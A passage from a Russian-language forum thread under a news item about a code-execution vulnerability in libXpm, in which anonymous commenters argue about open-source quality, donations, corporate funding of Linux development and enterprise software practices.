Сообщение от Аноним (70), 21-Янв-23, 22:47 
Утилита > утилита > утилита > You're pwned
Ответить | Правка | Наверх | Cообщить модератору

61. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 21-Янв-23, 22:11 
Блеск и нищета опенсорса.

Врачи пишут планировщики задач, студни и всякие бoмжы пишут свои утилитки "лишь бы работало", потом приходят другие и лепят на основе этих поделок что-то свое, потом это слепливают в большой дурнопахнущий ком и выкладывают в прод.

А потом оказывается что пол инета зависит от стремной либы, автор которой давно на нее забил, которая никогда не ревьювилась и не обновлялась уже годы...

Колосс на глиняных ногах!

Ответить | Правка | Наверх | Cообщить модератору

62. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Аноним (62), 21-Янв-23, 22:17 
Зато в ынтерпрайзе всё не так. Сеньёры молятся на новые версии библиотек и дают по рукам джунам, которые делают свои! :D
Ответить | Правка | Наверх | Cообщить модератору

67. "Уязвимость в libXpm, приводящая к выполнению кода"  –2 +/
Сообщение от Аноним (-), 21-Янв-23, 22:40 
В ынтерплайзе никто не будет писать либу просто так. По крайней мере в рабочее время.

Еще забыл про основной аргумент за опенсорс - бесплатность.

Спросишь 'Чем этот фоторедактор лучше чем стандарт индустрии?'
- 'Он же бесплатный!' ответят тебе.
- 'Но он же кривой, косой и багованый!'
- 'Зато бесплатный!'
Ох, это сладкое слово халява!

Те кто будут писать что проприетарный софт тоже ничего не должен - вы явно не доросли до SLA)))

Ответить | Правка | Наверх | Cообщить модератору

69. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (63), 21-Янв-23, 22:42 
Свободный и бесплатный это разные вещи.
Ответить | Правка | Наверх | Cообщить модератору

73. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 21-Янв-23, 22:59 
А я и не утверждал, что это одинаковые вещи.
Просто настоящих идейных крайне мало, но они хоть вызывают уважение.

Но большинство пользователей опенсорца интересует только аспект бесплатности.
Они просто качают ибо халява, крайне редко куда-то донатят и еще реже делают вклад написание кода/ревью/тестированием/дизайном. Подавляющему большинству даже лень багрепорты отправлять.

И единственный их вклад в развитие опенсорс - рассказать другу 'о, я тут беспланую аппу скачал!'

Ответить | Правка | Наверх | Cообщить модератору

74. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Аноним (-), 21-Янв-23, 23:09 
Это же все видно.
Посмотрите сколько пользователей у того же firefox, и сколько у них было донатов от 'физлиц' И заодно кол-во контрибьюторов в их репы.
Или у LibreOffice? Или GIMP?
Каждый сотый? Каждый тысячный? Или все еще хуже?

Людям как-то объяснили про бесплатность опенсорса, а про то что за свободу нужно платить - нет.

В итоге развивается только во что вложились корпорации. А пользователи ноют 'праклятые карпарасты испортили мой опенсорс'
Да он никогда их и не был!

Ответить | Правка | К родителю #69 | Наверх | Cообщить модератору

86. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Бывалый смузихлёб (?), 22-Янв-23, 05:26 
> за свободу нужно платить - нет

Свобода, за которую надо платить - это платная временная вольная от хозяина

По корпорациям и прочему - почему-то тот же опенсорс и его адептов вовсе не смущает, что абсолютное большинство на его благо трудится за доброе слово даже без прав на собственный код( а то и за пинок под жО за несоблюдение кок’ов )

Что вовсе не мешает руководству тех структур за счёт добровольных пожертвований платить самим себе зарплату и почти непрерывно кататься по всему миру и закатывать балы-пиры разумеется в рамках популяризации попенсорса вместо денежной поддержки участников.
Даже не зарплатных а хотя бы уровня выплаты за годную фичу. Даже полтишок - мелочь, а приятно.

В общем, уверен ли анон-знаток-всего-на-свете, что донаты идут именно на работу над продуктом и что за всю работу над проектом сама контора платит конечным разработчикам ?
Ну, чтобы иметь хоть какое-то минимальное право требовать денег за фичи

Ответить | Правка | Наверх | Cообщить модератору

90. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 22-Янв-23, 09:16 
> абсолютное большинство на его благо трудится за доброе слово

А потому что это не правда.

'The number of unpaid developers may be stabilizing, with these developers contributing 8.2% of contributions'
Источник: Annual Kernel Development Report
2017.
Это при том что в 2014 было 11.8%. А после ковида думаю их стало еще меньше, но цифры искать лень.

Т.е. абсолютное большинство трудится за хрустящую бумажку корпораций, а не за доброе слово.
И делать они будут то что им скажет корпоративный менеджер (за редким исключением супер крутых и распиаренных чуваков)

Более того, если глянуть другие отчеты, то там тоже куча всего интересного.
Напр. из '2022 Linux Foundation Annual Report' секция MENTORSHIP
- 70% чуваков из Индии
- 62% чуваков с не законченным колледжом и 23% с законченным
- High school или master degree есть только у 7.6% и 4.1% соответственно
- 52.9% это lower middle class (которые скорее всего надеятся найти работу в каком-то intel/ibm/redhat...)
В это будущее линукса)))

Ответить | Правка | Наверх | Cообщить модератору

91. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 22-Янв-23, 09:28 
> платить самим себе зарплату

А потому что они копируют корпоративную структуру от которой и получают деньги.
Поэтому и какая-то глава мозилы выплачивала себе миллионы баксов, прям как в фирмах выплачивают золотые парашюты.

Но нас вроде это парить не должно, это ж практические все деньги гугла?

> донаты идут именно на работу над продуктом и что за всю работу над проектом сама контора платит конечным разработчикам

Разумеется я этого не могу гарантировать. Более того, сейчас, думаю, они будут просыраться на банкеты и всякое дайверсити.

Просто обычные пользователи уже проиграли. Опенсорс нашел свой путь развития в видеслияния с корпами и будет отрабатывать их хотелки.
А пользователи могут только ныть на форумах про очередной системД, никак не влияя на направление развития продукта.

Ответить | Правка | К родителю #86 | Наверх | Cообщить модератору

93. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (92), 22-Янв-23, 09:50 
Раньше на сайте Криты писалась сумма пожертвований. Потом вроде убрали, чтобы не позориться.
Ответить | Правка | К родителю #74 | Наверх | Cообщить модератору

76. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (3), 21-Янв-23, 23:35 
> никто не будет писать либу просто так

дык за деньги же

в отечественном ынтерпрайзе токо и делают, что используют бесплатные либы. а кто считает, что это не так, тот явно не дорос

Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

78. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от Аноним (78), 21-Янв-23, 23:46 
>В ынтерплайзе никто не будет писать либу просто так

АХАХАХАХА

Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

83. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 22-Янв-23, 00:41 
> Те кто будут писать что проприетарный софт тоже ничего не должен -
> вы явно не доросли до SLA)))

Однако в лицензиях проприетарного софта почему-то написано про AS IS. Да, некоторые еще и читают это.

Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

84. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (1), 22-Янв-23, 00:50 
> В ынтерплайзе никто не будет писать либу просто так

То-то у "ынтерплайза" сейчас версионная диарея.

Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

87. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Бывалый смузихлёб (?), 22-Янв-23, 05:31 
> В ынтерплайзе никто не будет писать либу просто так.
> По крайней мере в рабочее время.

Ну почему же, вполне будет.
Только если это не согласовано с конторой, либо будут разборки о том кому код принадлежит, либо - сколько штрафа должен заплатить сотрудник за неисполнение обязанностей( т.е что на работе занимался не работой а черти чем, но зарплату ему платили будто бы он работал )

Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

102. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от хрю (?), 22-Янв-23, 14:23 
>>В ынтерплайзе никто не будет писать либу просто так.

:D :D :D :D :D Не реально смешно. Чел никогда не видел ынтерплайза? Зачастую, он чуть меньше чем полностью состоит из 7 колёсных велосипедов.

Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

85. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Аноним (34), 22-Янв-23, 01:42 
> Врачи пишут планировщики задач, студни и всякие бoмжы пишут свои утилитки "лишь бы работало", потом приходят другие и лепят на основе этих поделок что-то свое, потом это слепливают в большой дурнопахнущий ком и выкладывают в прод.

Святая наивность, ты никогда не видел коммерческой разработки изнутри.

Ответить | Правка | К родителю #61 | Наверх | Cообщить модератору

98. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (96), 22-Янв-23, 12:01 
https://xkcd.com/2347/
Ответить | Правка | К родителю #61 | Наверх | Cообщить модератору

88. "Уязвимость в libXpm, приводящая к выполнению кода"  –1 +/
Сообщение от Alex (??), 22-Янв-23, 06:13 
Странно, что не написали сколько лет этой уязвимости....
Ответить | Правка | Наверх | Cообщить модератору

89. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 22-Янв-23, 08:11 
Или им было стыдно это писать,
или все кто знал уже ущли на пенсию.
Ответить | Правка | Наверх | Cообщить модератору

104. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Аноним (1), 23-Янв-23, 00:15 
замена системных экзешников на троянов? Да постарше тебя уж.
Ответить | Правка | К родителю #88 | Наверх | Cообщить модератору

120. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (119), 25-Янв-23, 05:12 
Угар, конечно, как в тут
папуасы ругают классику программирования под юникс — т.н. shell out. А ведь это неотъемлемая часть «юникс-философии», за которую в комментариях порой убить готовы. Как же так выходит, половина комментаторов TAOUP не читала? Грешновато.
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру